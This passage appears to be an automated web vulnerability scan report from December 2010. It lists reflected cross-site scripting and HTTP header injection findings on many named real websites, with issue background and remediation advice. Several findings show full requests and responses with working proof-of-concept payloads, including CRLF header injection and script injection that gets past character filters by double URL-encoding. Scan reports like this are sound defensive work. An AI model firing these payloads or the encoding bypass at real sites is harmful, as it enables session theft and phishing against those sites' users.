2.447. http://www.fancast.com/blogs/2010/tuned-in-what-to-watch-today/what-to-watch-weekend-31/ [REST URL parameter 3]

2.448. http://www.fancast.com/blogs/2010/tuned-in-what-to-watch-today/what-to-watch-weekend-31/ [name of an arbitrarily supplied request parameter]

2.449. http://www.fancast.com/blogs/2010/tuned-in-what-to-watch-today/what-to-watch-weekend-31/ [name of an arbitrarily supplied request parameter]

2.450. http://www.fancast.com/blogs/2010/tv-news/bachelor-brad-womack-there-is-a-very-happy-ending/ [REST URL parameter 3]

2.451. http://www.fancast.com/blogs/2010/tv-news/bachelor-brad-womack-there-is-a-very-happy-ending/ [REST URL parameter 3]

2.452. http://www.fancast.com/blogs/2010/tv-news/bachelor-brad-womack-there-is-a-very-happy-ending/ [name of an arbitrarily supplied request parameter]

2.453. http://www.fancast.com/blogs/2010/tv-news/bachelor-brad-womack-there-is-a-very-happy-ending/ [name of an arbitrarily supplied request parameter]

2.454. http://www.fancast.com/blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/ [REST URL parameter 3]

2.455. http://www.fancast.com/blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/ [REST URL parameter 3]

2.456. http://www.fancast.com/blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/ [name of an arbitrarily supplied request parameter]

2.457. http://www.fancast.com/blogs/2010/tv-news/dexters-julia-stiles-i-didnt-break-up-michael-c.-halls-marriage/ [name of an arbitrarily supplied request parameter]

2.458. http://www.fancast.com/blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/ [REST URL parameter 3]

2.459. http://www.fancast.com/blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/ [REST URL parameter 3]

2.460. http://www.fancast.com/blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/ [name of an arbitrarily supplied request parameter]

2.461. http://www.fancast.com/blogs/2010/tv-news/good-bye-to-larry-king-well-miss-touches-that-made-his-show-unique/ [name of an arbitrarily supplied request parameter]

2.462. http://www.fancast.com/blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/ [REST URL parameter 3]

2.463. http://www.fancast.com/blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/ [REST URL parameter 3]

2.464. http://www.fancast.com/blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/ [name of an arbitrarily supplied request parameter]

2.465. http://www.fancast.com/blogs/2010/tv-news/huge-ratings-for-larry-kings-finale/ [name of an arbitrarily supplied request parameter]

2.466. http://www.fancast.com/blogs/2010/tv-news/jersey-shores-ronnie-indicted-on-assault-charge/ [REST URL parameter 3]

2.467. http://www.fancast.com/blogs/2010/tv-news/jersey-shores-ronnie-indicted-on-assault-charge/ [REST URL parameter 3]

2.468. http://www.fancast.com/blogs/2010/tv-news/jersey-shores-ronnie-indicted-on-assault-charge/ [name of an arbitrarily supplied request parameter]

2.469. http://www.fancast.com/blogs/2010/tv-news/jersey-shores-ronnie-indicted-on-assault-charge/ [name of an arbitrarily supplied request parameter]

2.470. http://www.fancast.com/blogs/2010/tv-news/late-night-foes-ferguson-and-fallon-swap-gifts/ [REST URL parameter 3]

2.471. http://www.fancast.com/blogs/2010/tv-news/late-night-foes-ferguson-and-fallon-swap-gifts/ [REST URL parameter 3]

2.472. http://www.fancast.com/blogs/2010/tv-news/late-night-foes-ferguson-and-fallon-swap-gifts/ [name of an arbitrarily supplied request parameter]

2.473. http://www.fancast.com/blogs/2010/tv-news/late-night-foes-ferguson-and-fallon-swap-gifts/ [name of an arbitrarily supplied request parameter]

2.474. http://www.fancast.com/blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/ [REST URL parameter 3]

2.475. http://www.fancast.com/blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/ [REST URL parameter 3]

2.476. http://www.fancast.com/blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/ [name of an arbitrarily supplied request parameter]

2.477. http://www.fancast.com/blogs/2010/tv-news/lettermans-top-ten-things-overheard-on-larry-kings-final-show/ [name of an arbitrarily supplied request parameter]

2.478. http://www.fancast.com/blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/ [REST URL parameter 3]

2.479. http://www.fancast.com/blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/ [REST URL parameter 3]

2.480. http://www.fancast.com/blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/ [name of an arbitrarily supplied request parameter]

2.481. http://www.fancast.com/blogs/2010/tv-news/neil-patrick-harris-slams-eric-braeden-for-bailing/ [name of an arbitrarily supplied request parameter]

2.482. http://www.fancast.com/blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/ [REST URL parameter 3]

2.483. http://www.fancast.com/blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/ [REST URL parameter 3]

2.484. http://www.fancast.com/blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/ [name of an arbitrarily supplied request parameter]

2.485. http://www.fancast.com/blogs/2010/tv-news/olbermann-attacked-on-twitter-calls-oreilly-the-worst/ [name of an arbitrarily supplied request parameter]

2.486. http://www.fancast.com/blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/ [REST URL parameter 3]

2.487. http://www.fancast.com/blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/ [REST URL parameter 3]

2.488. http://www.fancast.com/blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/ [name of an arbitrarily supplied request parameter]

2.489. http://www.fancast.com/blogs/2010/tv-news/sarah-palin-fires-back-calls-sorkins-criticism-appalling/ [name of an arbitrarily supplied request parameter]

2.490. http://www.fancast.com/blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/ [REST URL parameter 3]

2.491. http://www.fancast.com/blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/ [REST URL parameter 3]

2.492. http://www.fancast.com/blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/ [name of an arbitrarily supplied request parameter]

2.493. http://www.fancast.com/blogs/2010/tv-news/survivor-hall-of-fame-inductee-sandra-diaz-twine/ [name of an arbitrarily supplied request parameter]

2.494. http://www.fancast.com/blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/ [REST URL parameter 3]

2.495. http://www.fancast.com/blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/ [REST URL parameter 3]

2.496. http://www.fancast.com/blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/ [name of an arbitrarily supplied request parameter]

2.497. http://www.fancast.com/blogs/2010/tv-news/survivor-nicaragua-power-rankings-the-final-round/ [name of an arbitrarily supplied request parameter]

2.498. http://www.fancast.com/blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/ [REST URL parameter 3]

2.499. http://www.fancast.com/blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/ [REST URL parameter 3]

2.500. http://www.fancast.com/blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/ [name of an arbitrarily supplied request parameter]

2.501. http://www.fancast.com/blogs/2010/tv-news/the-good-wife-gets-social-in-facebook-stunt-episode/ [name of an arbitrarily supplied request parameter]

2.502. https://www.linkedin.com/secure/login [REST URL parameter 1]

2.503. http://www.move.com/trends/ [name of an arbitrarily supplied request parameter]

2.504. http://www.move.com/trends/celebrity-real-estate-highlights-36/ [REST URL parameter 2]

2.505. http://www.move.com/trends/celebrity-real-estate-highlights-36/ [name of an arbitrarily supplied request parameter]

2.506. http://www.move.com/trends/charity-gifts-for-christmas/ [REST URL parameter 2]

2.507. http://www.move.com/trends/charity-gifts-for-christmas/ [name of an arbitrarily supplied request parameter]

2.508. http://www.move.com/trends/holiday-gifts-for-the-cat-lover/ [REST URL parameter 2]

2.509. http://www.move.com/trends/holiday-gifts-for-the-cat-lover/ [name of an arbitrarily supplied request parameter]

2.510. http://www.move.com/trends/holiday-gifts-for-the-dog-lover/ [REST URL parameter 2]

2.511. http://www.move.com/trends/holiday-gifts-for-the-dog-lover/ [name of an arbitrarily supplied request parameter]

2.512. http://www.move.com/trends/sweet-holiday-treats-in-san-francisco/ [REST URL parameter 2]

2.513. http://www.move.com/trends/sweet-holiday-treats-in-san-francisco/ [name of an arbitrarily supplied request parameter]

2.514. http://www.mystyle.com/mystyle/photos/gallery.jsp [name of an arbitrarily supplied request parameter]

2.515. http://www.mystyle.com/mystyle/photos/gallery.jsp [name of an arbitrarily supplied request parameter]

2.516. http://www.nahb.org/news.aspx [name of an arbitrarily supplied request parameter]

2.517. http://www.nahb.org/page.aspx/landing/sectionID=85 [name of an arbitrarily supplied request parameter]

2.518. http://www.necn.com/12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html [REST URL parameter 1]

2.519. http://www.necn.com/12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html [REST URL parameter 2]

2.520. http://www.necn.com/12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html [REST URL parameter 3]

2.521. http://www.necn.com/12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html [REST URL parameter 4]

2.522. http://www.necn.com/12/19/10/Blaze-engulfs-West-Warwick-RI-triple-dec/landing.html [name of an arbitrarily supplied request parameter]

2.523. http://www.necn.com/12/19/10/Holiday-mad-dash/landing.html [REST URL parameter 1]

2.524. http://www.necn.com/12/19/10/Holiday-mad-dash/landing.html [REST URL parameter 2]

2.525. http://www.necn.com/12/19/10/Holiday-mad-dash/landing.html [REST URL parameter 3]

2.526. http://www.necn.com/12/19/10/Holiday-mad-dash/landing.html [REST URL parameter 4]

2.527. http://www.necn.com/12/19/10/Holiday-mad-dash/landing.html [name of an arbitrarily supplied request parameter]

2.528. http://www.necn.com/12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html [REST URL parameter 1]

2.529. http://www.necn.com/12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html [REST URL parameter 2]

2.530. http://www.necn.com/12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html [REST URL parameter 3]

2.531. http://www.necn.com/12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html [REST URL parameter 4]

2.532. http://www.necn.com/12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html [name of an arbitrarily supplied request parameter]

2.533. http://www.necn.com/12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html [REST URL parameter 1]

2.534. http://www.necn.com/12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html [REST URL parameter 2]

2.535. http://www.necn.com/12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html [REST URL parameter 3]

2.536. http://www.necn.com/12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html [REST URL parameter 4]

2.537. http://www.necn.com/12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html [name of an arbitrarily supplied request parameter]

2.538. http://www.necn.com/12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html [REST URL parameter 1]

2.539. http://www.necn.com/12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html [REST URL parameter 2]

2.540. http://www.necn.com/12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html [REST URL parameter 3]

2.541. http://www.necn.com/12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html [REST URL parameter 4]

2.542. http://www.necn.com/12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html [name of an arbitrarily supplied request parameter]

2.543. http://www.themtn.tv/04/27/10/MBK-Rebel-Matt-Shaw-to-miss-final-season/landing.html [REST URL parameter 5]

2.544. http://www.themtn.tv/05/11/10/MGLF-CSU-Claims-Mountain-West-Title/landing.html [REST URL parameter 5]

2.545. http://www.themtn.tv/05/19/10/CSU-Hosts-first-annual-Football-101-for-/landing.html [REST URL parameter 5]

2.546. http://www.themtn.tv/05/19/10/FB-Unga-Will-Not-Return-To-BYU/landing.html [REST URL parameter 5]

2.547. http://www.themtn.tv/06/01/10/Around-the-Mountain---Air-Force-Football/landing.html [REST URL parameter 5]

2.548. http://www.themtn.tv/06/01/10/Top-5-Plays-of-the-Year-Air-Force-Falcon/landing.html [REST URL parameter 5]

2.549. http://www.themtn.tv/06/14/10/Top-5-Plays-of-the-Year-Colorado-State-R/landing.html [REST URL parameter 5]

2.550. http://www.themtn.tv/06/16/10/Around-the-Mountain-CSU-Edition-img-srch/landing.html [REST URL parameter 5]

2.551. http://www.themtn.tv/06/16/10/Watch-The-TCU-Press-Conference-Live-at-1/landing.html [REST URL parameter 5]

2.552. http://www.themtn.tv/06/29/10/San-Diego-States-Top-5-Plays-of-the-Year/landing.html [REST URL parameter 5]

2.553. http://www.themtn.tv/07/13/10/Watch-The-UNLV-Rebels-Top-5-Plays-of-the/landing.html [REST URL parameter 5]

2.554. http://www.themtn.tv/08/05/10/ATM-Teams-Improving-img-srchttpthemtntvi/landing.html [REST URL parameter 5]

2.555. http://www.themtn.tv/09/08/10/Excellent-Source-for-Breaking-News/landing.html [REST URL parameter 5]

2.556. http://www.themtn.tv/09/14/10/Quality-Original-Programming/landing.html [REST URL parameter 5]

2.557. http://www.themtn.tv/09/18/10/FB-Rams-Lose-Third-Straight-31-10/landing.html [REST URL parameter 5]

2.558. http://www.themtn.tv/09/23/10/An-Impressed-Viewer/landing.html [REST URL parameter 5]

2.559. http://www.themtn.tv/10/13/10/ALL-22-Is-Alright/landing.html [REST URL parameter 5]

2.560. http://www.themtn.tv/10/27/10/Mountain-West-Football-Saturday-Comments/landing.html [REST URL parameter 5]

2.561. http://www.themtn.tv/11/20/10/FB-BYU-Becomes-Bowl-Eligible-After-Win-O/landing.html [REST URL parameter 5]

2.562. http://www.themtn.tv/11/20/10/FB-Wyoming-Shuts-Out-Rams-44-0-img-srcht/landing.html [REST URL parameter 5]

2.563. http://www.themtn.tv/11/21/10/FB-Utah-Outlasts-Aztecs-38-34/landing.html [REST URL parameter 5]

2.564. http://www.themtn.tv/11/27/10/FB-SDSU-Blows-BY-UNLV-48-14-img-srchttpt/landing.html [REST URL parameter 5]

2.565. http://www.themtn.tv/11/27/10/FB-TCU-Finishes-Strong-Over-Lobos-66-17-/landing.html [REST URL parameter 5]

2.566. http://www.themtn.tv/11/27/10/FB-Utah-Tops-BYU-17-16-img-srchttpthemtn/landing.html [REST URL parameter 5]

2.567. http://www.themtn.tv/11/27/10/MWC-Coach-Pressers-Week-13-img-srchttpth/landing.html [REST URL parameter 5]

2.568. http://www.themtn.tv/11/27/10/Todd-Christensen-The-End-of-an-Era-img-s/landing.html [REST URL parameter 5]

2.569. http://www.themtn.tv/11/29/10/TCU-Accepts-Big-East-Invite/landing.html [REST URL parameter 5]

2.570. http://www.themtn.tv/12/01/10/MBK-CSU-Runs-by-Drake-78-67-img-srchttpt/landing.html [REST URL parameter 5]

2.571. http://www.themtn.tv/12/01/10/The-Mtn-Launches-in-Atlanta-Grows-Covera/landing.html [REST URL parameter 5]

2.572. http://www.themtn.tv/12/02/10/MBK-Aztecs-Dominate-St-Marys-69-55-img-s/landing.html [REST URL parameter 5]

2.573. http://www.themtn.tv/12/04/10/MBK-TCU-Falls-to-Northern-Iowa-64-60-img/landing.html [REST URL parameter 5]

2.574. http://www.themtn.tv/12/04/10/MBK-Wyoming-Dominates-Indiana-State-81-5/landing.html [REST URL parameter 5]

2.575. http://www.themtn.tv/12/05/10/Frogs-to-Smell-the-Roses-Vegas-Gets-Top-/landing.html [REST URL parameter 5]

2.576. http://www.themtn.tv/12/07/10/WBK-Lobos-Fall-to-Arizona-84-60/landing.html [REST URL parameter 5]

2.577. http://www.themtn.tv/12/08/10/Knudson-Not-Your-Steppin-Stone-img-srcht/landing.html [REST URL parameter 5]

2.578. http://www.themtn.tv/12/10/10/Knudson-MWC-Hoops-Looking-Pretty-Powerfu/landing.html [REST URL parameter 5]

2.579. http://www.themtn.tv/12/10/10/MBK-15-SDSU-Tops-In-State-Rival-Cal-77-5/landing.html [REST URL parameter 5]

2.580. http://www.themtn.tv/12/10/10/MBK-18-BYU-Gives-Fredette-Succesful-Home/landing.html [REST URL parameter 5]

2.581. http://www.themtn.tv/12/11/10/MBK-Lobos-Sweep-Rivalry-Series-78-62-img/landing.html [REST URL parameter 5]

2.582. http://www.themtn.tv/12/14/10/The-Mtn-Available-on-Additional-Comcast-/landing.html [REST URL parameter 5]

2.583. http://www.themtn.tv/12/15/10/Knudson-The-Slant-on-the-New-Mexico-Bowl/landing.html [REST URL parameter 5]

2.584. http://www.themtn.tv/12/16/10/Around-the-Mountain-Web-Edition-img-srch/landing.html [REST URL parameter 5]

2.585. http://www.themtn.tv/12/16/10/WBK-Cowgirls-Fall-to-Badgers-63-59-img-s/landing.html [REST URL parameter 5]

2.586. http://www.themtn.tv/12/18/10/BYU-Overpowers-UTEP-in-New-Mexico-Bowl-5/landing.html [REST URL parameter 5]

2.587. http://www.themtn.tv/12/18/10/Knudson-The-Slant-on-the-Las-Vegas-Bowl/landing.html [REST URL parameter 5]

2.588. http://www.themtn.tv/common/ad_count.php [REST URL parameter 1]

2.589. http://www.themtn.tv/common/ad_count.php [REST URL parameter 2]

2.590. http://www.themtn.tv/common/dynrss/dynrss_3174_landing_.rss [REST URL parameter 1]

2.591. http://www.themtn.tv/common/dynrss/dynrss_3174_landing_.rss [REST URL parameter 2]

2.592. http://www.themtn.tv/common/dynrss/dynrss_3174_landing_.rss [REST URL parameter 3]

2.593. http://www.themtn.tv/common/global_flash/player/player.php [REST URL parameter 1]

2.594. http://www.themtn.tv/common/global_flash/player/player.php [REST URL parameter 2]

2.595. http://www.themtn.tv/common/global_flash/player/player.php [REST URL parameter 3]

2.596. http://www.themtn.tv/common/global_flash/player/player.php [REST URL parameter 4]

2.597. http://www.themtn.tv/common/js/aggregate.js [REST URL parameter 3]

2.598. http://www.themtn.tv/favicon.ico [REST URL parameter 1]

2.599. http://www.themtn.tv/pages/main [REST URL parameter 1]

2.600. http://www.themtn.tv/pages/main [REST URL parameter 2]

2.601. http://www.themtn.tv/pages/main [name of an arbitrarily supplied request parameter]

2.602. http://www.tumri.net/ads/mts/6274 [name of an arbitrarily supplied request parameter]

2.603. http://www.tvoneonline.com/gettvone.asp [name of an arbitrarily supplied request parameter]

2.604. http://www.tvoneonline.com/video/b_player.php [name of an arbitrarily supplied request parameter]

2.605. http://www.tweetology.com/images/button-login.png [REST URL parameter 1]

2.606. http://www.tweetology.com/images/button-login.png [REST URL parameter 2]

2.607. http://www.tweetology.com/images/widget/scrollbar-top-e8e8e8.png [REST URL parameter 1]

2.608. http://www.tweetology.com/images/widget/scrollbar-top-e8e8e8.png [REST URL parameter 2]

2.609. http://www5.nohold.net/Comcast/Loginr.aspx [name of an arbitrarily supplied request parameter]

2.610. http://www5.nohold.net/Comcast/login.aspx [name of an arbitrarily supplied request parameter]

2.611. http://jobsearch.comcast.monster.com/ [Referer HTTP header]

2.612. http://www.addthis.com/bookmark.php [Referer HTTP header]

2.613. http://www.addthis.com/bookmark.php [Referer HTTP header]

1. HTTP header injection
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://www.destinationurl.com/1ab3/dclk.beacon/beacon1 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.destinationurl.com
Path:   /1ab3/dclk.beacon/beacon1

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2161b%0d%0ad9dd7e4e338 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2161b%0d%0ad9dd7e4e338/dclk.beacon/beacon1 HTTP/1.1
Host: www.destinationurl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2161b
d9dd7e4e338
/dclk.beacon/beacon1:
Date: Sun, 19 Dec 2010 18:33:52 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

1.2. http://www.destinationurl.com/1ab3/dclk.beaconreceived/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.destinationurl.com
Path:   /1ab3/dclk.beaconreceived/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 15e15%0d%0ad4200a93b03 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /15e15%0d%0ad4200a93b03/dclk.beaconreceived/ HTTP/1.1
Host: www.destinationurl.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/15e15
d4200a93b03
/dclk.beaconreceived/:
Date: Sun, 19 Dec 2010 18:33:54 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2. Cross-site scripting (reflected)
There are 613 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d70c2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eedcf3732e98 was submitted in the REST URL parameter 2. This input was echoed as d70c2"><script>alert(1)</script>edcf3732e98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357d70c2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eedcf3732e98/561.0.iframe.120x30/1292781815776969 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1926

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<a href="http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357d70c2"><script>alert(1)</script>edcf3732e98/561.0.iframe.120x30/" target="_blank" border="0" style="border:0px;">
...[SNIP]...

2.2. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1f7a%2522%253balert%25281%2529%252f%252fe814149ac20 was submitted in the REST URL parameter 2. This input was echoed as b1f7a";alert(1)//e814149ac20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357b1f7a%2522%253balert%25281%2529%252f%252fe814149ac20/561.0.iframe.120x30/1292781815776969 HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=OPT_OUT; i_1=46:561:23:3:0:30875:1292781871:B2|46:561:516:3:0:30875:1292781816:B2|46:1354:832:44:0:35107:1292779066:L; fp=138000:eq:1:CS:02:2:1292256153:1:33;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sun, 19 Dec 2010 18:06:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1881

<html><head></head><body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0"><script type="text/javascript">    function fpv() {
       try {
           var axo = new ActiveXObject('ShockwaveFlash.Shockwave
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357b1f7a";alert(1)//e814149ac20/561.0.iframe.120x30/1292781965**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'">
...[SNIP]...

2.3. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/561.0.iframe.120x30/1292781815776969

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 351b5%2522%253balert%25281%2529%252f%252f463fb0d5a8a was submitted in the REST URL parameter 3. This input was echoed as 351b5";alert(1)//463fb0d5a8a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

